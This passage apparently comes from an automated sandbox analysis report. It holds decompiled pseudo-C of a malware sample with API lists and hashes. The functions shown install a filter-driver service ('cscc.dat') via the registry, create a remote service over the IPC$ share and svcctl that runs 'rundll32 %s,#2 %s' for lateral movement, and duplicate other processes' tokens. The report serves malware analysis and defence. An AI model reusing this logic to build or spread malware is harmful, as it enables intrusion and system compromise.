                                                                                                          						if(RegSetValueExW(_v8, _t49, 0, _t54,  &_v12, _t54) == 0 && RegSetValueExW(_v8, _t49, 0, 4,  &_v12, 4) == 0 && RegSetValueExW(_v8, L"Group", 0, 1, L"Filter", 0xe) == 0 && RegSetValueExW(_v8, L"DependOnService", 0, 7, L"FltMgr", 0xe) == 0) {
                                                                                                          							_v20 = 3;
                                                                                                          							if(RegSetValueExW(_v8, L"ErrorControl", 0, 4,  &_v20, 4) == 0) {
                                                                                                          								_t45 = RegSetValueExW(_v8, L"ImagePath", 0, 2, L"cscc.dat", 0x12);
                                                                                                          								if(_t45 == 0) {
                                                                                                          									do {
                                                                                                          										_t47 =  *(L"cdfs" + _t45) & 0x0000ffff;
                                                                                                          										 *(L"cscc" + _t45) = _t47;
                                                                                                          										_t45 = _t45 + 2;
                                                                                                          									} while (_t47 != 0);
                                                                                                          									_v16 = 1;
                                                                                                          								}
                                                                                                          							}
                                                                                                          						}
                                                                                                          					}
                                                                                                          					RegCloseKey(_v8);
                                                                                                          				}
                                                                                                          				return _v16;
                                                                                                          			}













                                                                                                          0x04a41405
                                                                                                          0x04a41408
                                                                                                          0x04a4142f
                                                                                                          0x04a41439
                                                                                                          0x04a41444
                                                                                                          0x04a4144d
                                                                                                          0x04a41450
                                                                                                          0x04a4145b
                                                                                                          0x04a4147b
                                                                                                          0x04a41482
                                                                                                          0x04a414e2
                                                                                                          0x04a414ed
                                                                                                          0x04a41501
                                                                                                          0x04a41505
                                                                                                          0x04a41507
                                                                                                          0x04a41507
                                                                                                          0x04a4150e
                                                                                                          0x04a41515
                                                                                                          0x04a41518
                                                                                                          0x04a4151d
                                                                                                          0x04a4151d
                                                                                                          0x04a41505
                                                                                                          0x04a414ed
                                                                                                          0x04a41482
                                                                                                          0x04a41523
                                                                                                          0x04a4152a
                                                                                                          0x04a41530

                                                                                                          APIs
                                                                                                          • wsprintfW.USER32 ref: 04A41408
                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,000F003F,?), ref: 04A41427
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Start,00000000,00000000,?,?,?,00000000), ref: 04A41453
                                                                                                          • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04A4147E
                                                                                                          • RegSetValueExW.ADVAPI32(?,Start,00000000,00000004,?,00000004,?,00000000), ref: 04A41495
                                                                                                          • RegSetValueExW.ADVAPI32(?,Group,00000000,00000001,Filter,0000000E,?,00000000), ref: 04A414B3
                                                                                                          • RegSetValueExW.ADVAPI32(?,DependOnService,00000000,00000007,FltMgr,0000000E,?,00000000), ref: 04A414CB
                                                                                                          • RegSetValueExW.ADVAPI32(?,ErrorControl,00000000,00000004,?,00000004,?,00000000), ref: 04A414E9
                                                                                                          • RegSetValueExW.ADVAPI32(?,ImagePath,00000000,00000002,cscc.dat,00000012,?,00000000), ref: 04A41501
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 04A41523
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Value$CloseOpenQuerywsprintf
                                                                                                          • String ID: DependOnService$ErrorControl$Filter$FltMgr$Group$ImagePath$SYSTEM\CurrentControlSet\services\%ws$Start$cdfs$cscc$cscc.dat
                                                                                                          • API String ID: 693892761-175094307
                                                                                                          • Opcode ID: fb32a07b27259ed926ac6e1656e985e3c88eda4ec2e0fbb712c95b549857ade4
                                                                                                          • Instruction ID: acc0a1972113a9629257038c4922275d73a7a36cd841f55b0776a3b8d01a4131
                                                                                                          • Opcode Fuzzy Hash: fb32a07b27259ed926ac6e1656e985e3c88eda4ec2e0fbb712c95b549857ade4
                                                                                                          • Instruction Fuzzy Hash: B73150B1A4121DBAEB109F919D49FEF7B7CEBC8B84F100055FA05B6050E374AF419E62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 83%
                                                                                                          			E04A4516B(void* __ecx, intOrPtr _a4, char _a8, signed int _a12, signed char _a15, signed int _a16, intOrPtr _a20) {
                                                                                                          				char _v5;
                                                                                                          				signed int _v12;
                                                                                                          				void* _v16;
                                                                                                          				char* _v20;
                                                                                                          				void* _t72;
                                                                                                          				void* _t79;
                                                                                                          				signed int _t80;
                                                                                                          				signed int _t82;
                                                                                                          				signed int _t84;
                                                                                                          				intOrPtr* _t91;
                                                                                                          				intOrPtr* _t104;
                                                                                                          				void* _t109;
                                                                                                          				signed int _t112;
                                                                                                          				signed int _t113;
                                                                                                          				intOrPtr _t115;
                                                                                                          				signed int _t116;
                                                                                                          				intOrPtr _t118;
                                                                                                          				intOrPtr* _t122;
                                                                                                          
                                                                                                          				_t126 = _a4;
                                                                                                          				_v5 = 0;
                                                                                                          				if(E04A41EB9(_a4,  &_a8, _a12, "IPC$") != 0) {
                                                                                                          					_v12 = _v12 & 0x00000000;
                                                                                                          					if(E04A42054(_t126, _a8,  &_v12, "svcctl", 1) != 0 && E04A44E60(_t126, _a8, _v12) != 0) {
                                                                                                          						_t72 = HeapAlloc(GetProcessHeap(), 8, 0x14);
                                                                                                          						_v16 = _t72;
                                                                                                          						if(_t72 != 0) {
                                                                                                          							if(E04A44F43(_v12, _t126, _a8,  &_v16) != 0) {
                                                                                                          								_t79 = HeapAlloc(GetProcessHeap(), 8, 0x20);
                                                                                                          								_v20 = _t79;
                                                                                                          								if(_t79 != 0) {
                                                                                                          									_t80 = rand();
                                                                                                          									asm("cdq");
                                                                                                          									_push(_t80 % 0xf4240);
                                                                                                          									_t82 = rand();
                                                                                                          									asm("cdq");
                                                                                                          									_t112 = 0xa;
                                                                                                          									_push(_t82 % _t112);
                                                                                                          									_t84 = rand();
                                                                                                          									_t113 = 0xa;
                                                                                                          									asm("cdq");
                                                                                                          									_push(_t84 % _t113);
                                                                                                          									sprintf(_v20, "clr_optimization_v%d.%d.%d");
                                                                                                          									_t109 = HeapAlloc(GetProcessHeap(), 8, 0x208);
                                                                                                          									if(_t109 != 0) {
                                                                                                          										_t122 = _a16;
                                                                                                          										_t91 = _t122;
                                                                                                          										_a15 = 0;
                                                                                                          										_a16 = _t91 + 1;
                                                                                                          										do {
                                                                                                          											_t115 =  *_t91;
                                                                                                          											_t91 = _t91 + 1;
                                                                                                          										} while (_t115 != 0);
                                                                                                          										if(_t91 != _a16) {
                                                                                                          											_t116 = 0;
                                                                                                          											do {
                                                                                                          												_a15 = _a15 + 1;
                                                                                                          												 *((char*)(_t109 + _t116)) =  *((intOrPtr*)(_t116 + _t122));
                                                                                                          												_t104 = _t122;
                                                                                                          												_a16 = _t104 + 1;
                                                                                                          												do {
                                                                                                          													_t118 =  *_t104;
                                                                                                          													_t104 = _t104 + 1;
                                                                                                          												} while (_t118 != 0);
                                                                                                          												_t116 = _a15 & 0x000000ff;
                                                                                                          											} while (_t116 < _t104 - _a16);
                                                                                                          										}
                                                                                                          										sprintf(_t109, "rundll32 %s,#2 %s", _a20, _t122);
                                                                                                          										_a16 = _a16 & 0x00000000;
                                                                                                          										_a12 = _a12 & 0x00000000;
                                                                                                          										if(E04A44B5D(_v20, _v16, _t109,  &_a16,  &_a12) != 0 && E04A4501E(_t115, _a4, _a8, _v12, _a16, _a12,  &_v16) != 0 && E04A450A2(_t115, _a4, _a8, _v12, _v16) != 0) {
                                                                                                          											_v5 = 1;
                                                                                                          										}
                                                                                                          										HeapFree(GetProcessHeap(), 8, _t109);
                                                                                                          									}
                                                                                                          									HeapFree(GetProcessHeap(), 8, _v20);
                                                                                                          								}
                                                                                                          							}
                                                                                                          							HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v5;
                                                                                                          			}





















                                                                                                          0x04a45172
                                                                                                          0x04a45182
                                                                                                          0x04a4518d
                                                                                                          0x04a45193
                                                                                                          0x04a451ad
                                                                                                          0x04a451dc
                                                                                                          0x04a451de
                                                                                                          0x04a451e3
                                                                                                          0x04a451fb
                                                                                                          0x04a45208
                                                                                                          0x04a4520a
                                                                                                          0x04a4520f
                                                                                                          0x04a4521b
                                                                                                          0x04a4521d
                                                                                                          0x04a45225
                                                                                                          0x04a45226
                                                                                                          0x04a4522a
                                                                                                          0x04a4522b
                                                                                                          0x04a4522e
                                                                                                          0x04a4522f
                                                                                                          0x04a45233
                                                                                                          0x04a45234
                                                                                                          0x04a4523d
                                                                                                          0x04a45246
                                                                                                          0x04a45257
                                                                                                          0x04a4525b
                                                                                                          0x04a45261
                                                                                                          0x04a45264
                                                                                                          0x04a45269
                                                                                                          0x04a4526d
                                                                                                          0x04a45270
                                                                                                          0x04a45270
                                                                                                          0x04a45272
                                                                                                          0x04a45273
                                                                                                          0x04a4527a
                                                                                                          0x04a4527c
                                                                                                          0x04a4527e
                                                                                                          0x04a45281
                                                                                                          0x04a45284
                                                                                                          0x04a45287
                                                                                                          0x04a4528c
                                                                                                          0x04a4528f
                                                                                                          0x04a4528f
                                                                                                          0x04a45291
                                                                                                          0x04a45292
                                                                                                          0x04a45296
                                                                                                          0x04a4529d
                                                                                                          0x04a4527e
                                                                                                          0x04a452ab
                                                                                                          0x04a452ad
                                                                                                          0x04a452b1
                                                                                                          0x04a452ce
                                                                                                          0x04a45301
                                                                                                          0x04a45301
                                                                                                          0x04a4530b
                                                                                                          0x04a4530b
                                                                                                          0x04a45319
                                                                                                          0x04a45319
                                                                                                          0x04a4520f
                                                                                                          0x04a45327
                                                                                                          0x04a45327
                                                                                                          0x04a4532e
                                                                                                          0x04a451ad
                                                                                                          0x04a45334

                                                                                                          APIs
                                                                                                            • Part of subcall function 04A41EB9: GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,04A4943A), ref: 04A41ED2
                                                                                                            • Part of subcall function 04A41EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A41EDB
                                                                                                            • Part of subcall function 04A41EB9: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04A4943A), ref: 04A41F1F
                                                                                                            • Part of subcall function 04A41EB9: HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A41F22
                                                                                                            • Part of subcall function 04A41EB9: htons.WS2_32(?), ref: 04A41F41
                                                                                                            • Part of subcall function 04A42054: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,00000000,?,0BADF00D,?,?,?,?,04A4943A), ref: 04A4206D
                                                                                                            • Part of subcall function 04A42054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A42076
                                                                                                            • Part of subcall function 04A42054: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,04A4943A), ref: 04A4209C
                                                                                                            • Part of subcall function 04A42054: HeapAlloc.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A4209F
                                                                                                            • Part of subcall function 04A42054: htons.WS2_32(?), ref: 04A420BC
                                                                                                            • Part of subcall function 04A42054: send.WS2_32(?,00000000,?,00000000), ref: 04A42131
                                                                                                            • Part of subcall function 04A42054: recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04A42148
                                                                                                            • Part of subcall function 04A42054: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,04A4943A), ref: 04A42168
                                                                                                            • Part of subcall function 04A42054: HeapFree.KERNEL32(00000000,?,?,?,?,04A4943A), ref: 04A4216F
                                                                                                            • Part of subcall function 04A44E60: GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04A44E76
                                                                                                            • Part of subcall function 04A44E60: HeapAlloc.KERNEL32(00000000), ref: 04A44E79
                                                                                                            • Part of subcall function 04A44E60: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04A44F2A
                                                                                                            • Part of subcall function 04A44E60: HeapFree.KERNEL32(00000000), ref: 04A44F2D
                                                                                                            • Part of subcall function 04A44E60: GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04A44F32
                                                                                                            • Part of subcall function 04A44E60: HeapFree.KERNEL32(00000000), ref: 04A44F35
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000014,?,00000000,?,00000000,00000000,?,00000000,00000000,svcctl,00000001,?,00000000,00000000,IPC$), ref: 04A451D3
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A451DC
                                                                                                            • Part of subcall function 04A44F43: GetProcessHeap.KERNEL32(00000008,00000068,74714F20,?,77D44620,?,04A451F9,?,?,?), ref: 04A44F56
                                                                                                            • Part of subcall function 04A44F43: HeapAlloc.KERNEL32(00000000,?,04A451F9,?,?,?), ref: 04A44F5D
                                                                                                            • Part of subcall function 04A44F43: rand.MSVCRT ref: 04A44F86
                                                                                                            • Part of subcall function 04A44F43: GetProcessHeap.KERNEL32(00000008,?,04A451F9,?,00000000,?,04A451F9,04A451F9,?,00000000,00000000,000000FF,00000008,00000000,00000068), ref: 04A44FF7
                                                                                                            • Part of subcall function 04A44F43: HeapFree.KERNEL32(00000000), ref: 04A44FFE
                                                                                                            • Part of subcall function 04A44F43: GetProcessHeap.KERNEL32(00000008,00000000,04A451F9,?,00000000,00000000,000000FF,00000008,00000000,00000068,?,04A451F9,?,?,?), ref: 04A45007
                                                                                                            • Part of subcall function 04A44F43: HeapFree.KERNEL32(00000000,?,04A451F9,?,?,?), ref: 04A4500E
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000020,?,?,?), ref: 04A45205
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 04A45208
                                                                                                          • rand.MSVCRT ref: 04A4521B
                                                                                                          • rand.MSVCRT ref: 04A45226
                                                                                                          • rand.MSVCRT ref: 04A4522F
                                                                                                          • sprintf.MSVCRT ref: 04A45246
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45252
                                                                                                          • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45255
                                                                                                          • sprintf.MSVCRT ref: 04A452AB
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,00000000,00000000), ref: 04A45308
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A4530B
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45316
                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,04A4943A), ref: 04A45319
                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,?,?), ref: 04A45324
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A45327
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$Alloc$Free$rand$htonssprintf$recvsend
                                                                                                          • String ID: Uqt0Xqt$IPC$$clr_optimization_v%d.%d.%d$rundll32 %s,#2 %s$svcctl
                                                                                                          • API String ID: 1576125627-295213134
                                                                                                          • Opcode ID: c43a9bca3cf9d49371e56b3cd213e1ad818f132958acf503e26f6a1967853732
                                                                                                          • Instruction ID: 5682dc4439b164ed7f4f426b8e35f813e08537dbf3f70dc3effb6bc868a5ae19
                                                                                                          • Opcode Fuzzy Hash: c43a9bca3cf9d49371e56b3cd213e1ad818f132958acf503e26f6a1967853732
                                                                                                          • Instruction Fuzzy Hash: 60518C76900209BBEF019FA48D54FEE7BA9EFC9304F444045FA50AA191DBB6E915CB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 97%
                                                                                                          			E04A485FB(void* __eflags, long _a4, void _a8, void* _a12, long _a16, void _a20, int _a24, intOrPtr _a36, void* _a88, char _a92, long _a96, char _a648, int _a656, void _a660) {
                                                                                                          				void* _v0;
                                                                                                          				void* _v4;
                                                                                                          				void _v8;
                                                                                                          				void* _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				intOrPtr _v20;
                                                                                                          				intOrPtr _v24;
                                                                                                          				signed int _v28;
                                                                                                          				void* _t62;
                                                                                                          				void* _t69;
                                                                                                          				signed int _t85;
                                                                                                          				signed int _t89;
                                                                                                          				intOrPtr _t103;
                                                                                                          				signed int _t107;
                                                                                                          				void* _t109;
                                                                                                          
                                                                                                          				E04A4A760(0x1294);
                                                                                                          				_a8 = 0;
                                                                                                          				_a24 = 0;
                                                                                                          				_a656 = 0;
                                                                                                          				memset( &_a660, 0, 0xffc);
                                                                                                          				_t109 = (_t107 & 0xfffffff8) + 0xc;
                                                                                                          				_v0 = 0;
                                                                                                          				_a36 = E04A48147();
                                                                                                          				_t62 = CreateToolhelp32Snapshot(2, 0);
                                                                                                          				_a16 = _t62;
                                                                                                          				if(_t62 == 0xffffffff) {
                                                                                                          					L21:
                                                                                                          					return _a4;
                                                                                                          				}
                                                                                                          				_push( &_a92);
                                                                                                          				_a92 = 0x22c;
                                                                                                          				if(Process32FirstW(_t62) == 0) {
                                                                                                          					GetLastError();
                                                                                                          					L20:
                                                                                                          					CloseHandle(_a12);
                                                                                                          					goto L21;
                                                                                                          				}
                                                                                                          				_a24 = _a4 -  &_a648;
                                                                                                          				do {
                                                                                                          					_a8 = _a8 | 0xffffffff;
                                                                                                          					_v4 = 0;
                                                                                                          					_a4 = 0;
                                                                                                          					_t69 = OpenProcess(0x450, 0, _a96);
                                                                                                          					_a20 = _t69;
                                                                                                          					if(_t69 == 0) {
                                                                                                          						L16:
                                                                                                          						if(_v0 >= 0x40) {
                                                                                                          							goto L20;
                                                                                                          						}
                                                                                                          						goto L17;
                                                                                                          					}
                                                                                                          					if(OpenProcessToken(_t69, 0x2000000,  &_v4) == 0 || GetTokenInformation(_v4, 0xc,  &_a8, 4,  &_a16) == 0 || _a24 != 0 && _a4 == 0 || DuplicateTokenEx(_v8, 0x2000000, 0, 2, 2,  &_v0) == 0) {
                                                                                                          						L15:
                                                                                                          						CloseHandle(_v4);
                                                                                                          						CloseHandle(_a20);
                                                                                                          						goto L16;
                                                                                                          					} else {
                                                                                                          						memset( &_a20, 0, 0x38);
                                                                                                          						_t109 = _t109 + 0xc;
                                                                                                          						if(GetTokenInformation(_v8, 0xa,  &_a20, 0x38,  &_a4) == 0) {
                                                                                                          							goto L15;
                                                                                                          						}
                                                                                                          						_t103 = _a24;
                                                                                                          						_t85 = 0;
                                                                                                          						if(_v24 <= 0) {
                                                                                                          							L13:
                                                                                                          							if(SetTokenInformation(_v12, 0xc,  &_v8, 4) != 0) {
                                                                                                          								_t89 = _v28 << 2;
                                                                                                          								_v20 = _v20 + 1;
                                                                                                          								_v28 = _v28 + 1;
                                                                                                          								 *((intOrPtr*)(_t109 + _a4 + _t89 + 0x2a0)) = _v16;
                                                                                                          								 *((intOrPtr*)(_t109 + _t89 + 0x2a0)) = _t103;
                                                                                                          							}
                                                                                                          							goto L15;
                                                                                                          						}
                                                                                                          						while( *((intOrPtr*)(_t109 + 0x2a0 + _t85 * 4)) != _t103) {
                                                                                                          							_t85 = _t85 + 1;
                                                                                                          							if(_t85 < _v24) {
                                                                                                          								continue;
                                                                                                          							}
                                                                                                          							goto L13;
                                                                                                          						}
                                                                                                          						goto L15;
                                                                                                          					}
                                                                                                          					L17:
                                                                                                          				} while (Process32NextW(_a12,  &_a88) != 0);
                                                                                                          				goto L20;
                                                                                                          			}


















                                                                                                          0x04a48606
                                                                                                          0x04a4861e
                                                                                                          0x04a48622
                                                                                                          0x04a48626
                                                                                                          0x04a4862d
                                                                                                          0x04a48632
                                                                                                          0x04a48635
                                                                                                          0x04a48641
                                                                                                          0x04a48645
                                                                                                          0x04a4864b
                                                                                                          0x04a48652
                                                                                                          0x04a487da
                                                                                                          0x04a487e4
                                                                                                          0x04a487e4
                                                                                                          0x04a4865c
                                                                                                          0x04a4865e
                                                                                                          0x04a4866e
                                                                                                          0x04a487ca
                                                                                                          0x04a487d0
                                                                                                          0x04a487d4
                                                                                                          0x00000000
                                                                                                          0x04a487d4
                                                                                                          0x04a48680
                                                                                                          0x04a48689
                                                                                                          0x04a4868d
                                                                                                          0x04a48698
                                                                                                          0x04a4869c
                                                                                                          0x04a486a0
                                                                                                          0x04a486a6
                                                                                                          0x04a486ac
                                                                                                          0x04a487aa
                                                                                                          0x04a487af
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a487af
                                                                                                          0x04a486c1
                                                                                                          0x04a48798
                                                                                                          0x04a487a2
                                                                                                          0x04a487a8
                                                                                                          0x00000000
                                                                                                          0x04a48716
                                                                                                          0x04a4871e
                                                                                                          0x04a48723
                                                                                                          0x04a4873c
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a4873e
                                                                                                          0x04a48742
                                                                                                          0x04a48748
                                                                                                          0x04a4875a
                                                                                                          0x04a4876f
                                                                                                          0x04a4877d
                                                                                                          0x04a48782
                                                                                                          0x04a48786
                                                                                                          0x04a4878a
                                                                                                          0x04a48791
                                                                                                          0x04a48791
                                                                                                          0x00000000
                                                                                                          0x04a4876f
                                                                                                          0x04a4874a
                                                                                                          0x04a48753
                                                                                                          0x04a48758
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48758
                                                                                                          0x00000000
                                                                                                          0x04a4874a
                                                                                                          0x04a487b1
                                                                                                          0x04a487c0
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • memset.MSVCRT ref: 04A4862D
                                                                                                            • Part of subcall function 04A48147: memset.MSVCRT ref: 04A48160
                                                                                                            • Part of subcall function 04A48147: GetVersionExW.KERNEL32(?,?,?,747143E0), ref: 04A48179
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04A48645
                                                                                                          • Process32FirstW.KERNEL32 ref: 04A48666
                                                                                                          • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 04A486A0
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 04A486B9
                                                                                                          • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 04A486DF
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 04A48708
                                                                                                          • memset.MSVCRT ref: 04A4871E
                                                                                                          • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 04A48738
                                                                                                          • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 04A48767
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A487A2
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A487A8
                                                                                                          • Process32NextW.KERNEL32(?,?), ref: 04A487BA
                                                                                                          • GetLastError.KERNEL32 ref: 04A487CA
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A487D4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                                                                          • String ID: @
                                                                                                          • API String ID: 4137997400-2766056989
                                                                                                          • Opcode ID: 75861d98fe29a837c20b601d69d005f85e8cb4a27586dcfa8d7262624d9de711
                                                                                                          • Instruction ID: 347b960587e1960e302c1adf8de3b5c31942e21426f5546a5107affdf105f491
                                                                                                          • Opcode Fuzzy Hash: 75861d98fe29a837c20b601d69d005f85e8cb4a27586dcfa8d7262624d9de711
                                                                                                          • Instruction Fuzzy Hash: 38513BB5608301AFE320AF25E848A6FBBE8FBC8754F440A2DF695D6190D735D906CB52
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 50%
                                                                                                          			E04A43071(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void** _a16, int* _a20) {
                                                                                                          				char _v5;
                                                                                                          				void* _v12;
                                                                                                          				void* _t25;
                                                                                                          				void* _t31;
                                                                                                          				void* _t37;
                                                                                                          				void* _t40;
                                                                                                          				signed int _t43;
                                                                                                          				int _t48;
                                                                                                          				int* _t60;
                                                                                                          
                                                                                                          				_v5 = 0;
                                                                                                          				_t25 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                          				_v12 = _t25;
                                                                                                          				if(_t25 == 0) {
                                                                                                          					L9:
                                                                                                          					return _v5;
                                                                                                          				}
                                                                                                          				_t40 = HeapAlloc(GetProcessHeap(), 8, 0x3f);
                                                                                                          				if(_t40 == 0) {
                                                                                                          					L8:
                                                                                                          					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                          					goto L9;
                                                                                                          				}
                                                                                                          				_t43 = 9;
                                                                                                          				_t31 = memcpy(_t40, _a8, _t43 << 2);
                                                                                                          				__imp__#9(0x3b);
                                                                                                          				 *(_t40 + 2) = _t31;
                                                                                                          				 *((short*)(_t40 + 0x29)) = _a12;
                                                                                                          				 *((char*)(_t40 + 8)) = 0x2e;
                                                                                                          				 *((short*)(_t40 + 0x24)) = 0xff0c;
                                                                                                          				 *((short*)(_t40 + 0x2f)) = 0xfde8;
                                                                                                          				 *((short*)(_t40 + 0x31)) = 0xfde8;
                                                                                                          				 *((short*)(_t40 + 0x37)) = 0xfde8;
                                                                                                          				__imp__#19(_a4, _t40, 0x3f, 0);
                                                                                                          				if(0xfde8 > 0) {
                                                                                                          					__imp__#16(_a4, _v12, 0xffff, 0);
                                                                                                          					_t60 = _a20;
                                                                                                          					 *_t60 = 0xfde8;
                                                                                                          					if(0xfde8 > 0 &&  *((intOrPtr*)(_v12 + 9)) == 0) {
                                                                                                          						_t37 = HeapAlloc(GetProcessHeap(), 8, 0xfde8);
                                                                                                          						 *_a16 = _t37;
                                                                                                          						_t48 =  *_t60;
                                                                                                          						if(_t48 != 0) {
                                                                                                          							memcpy(_t37, _v12, _t48);
                                                                                                          							_v5 = 1;
                                                                                                          						}
                                                                                                          					}
                                                                                                          				}
                                                                                                          				HeapFree(GetProcessHeap(), 8, _t40);
                                                                                                          				goto L8;
                                                                                                          			}












                                                                                                          0x04a43085
                                                                                                          0x04a43092
                                                                                                          0x04a43094
                                                                                                          0x04a43099
                                                                                                          0x04a43173
                                                                                                          0x04a43179
                                                                                                          0x04a43179
                                                                                                          0x04a430a9
                                                                                                          0x04a430ad
                                                                                                          0x04a43160
                                                                                                          0x04a4316c
                                                                                                          0x00000000
                                                                                                          0x04a43172
                                                                                                          0x04a430b8
                                                                                                          0x04a430bd
                                                                                                          0x04a430bf
                                                                                                          0x04a430c5
                                                                                                          0x04a430d2
                                                                                                          0x04a430e1
                                                                                                          0x04a430e5
                                                                                                          0x04a430eb
                                                                                                          0x04a430ef
                                                                                                          0x04a430f3
                                                                                                          0x04a430f7
                                                                                                          0x04a430ff
                                                                                                          0x04a4310d
                                                                                                          0x04a43113
                                                                                                          0x04a43116
                                                                                                          0x04a4311a
                                                                                                          0x04a4312e
                                                                                                          0x04a43137
                                                                                                          0x04a43139
                                                                                                          0x04a4313d
                                                                                                          0x04a43144
                                                                                                          0x04a4314c
                                                                                                          0x04a4314c
                                                                                                          0x04a4313d
                                                                                                          0x04a4311a
                                                                                                          0x04a4315a
                                                                                                          0x00000000

                                                                                                          APIs
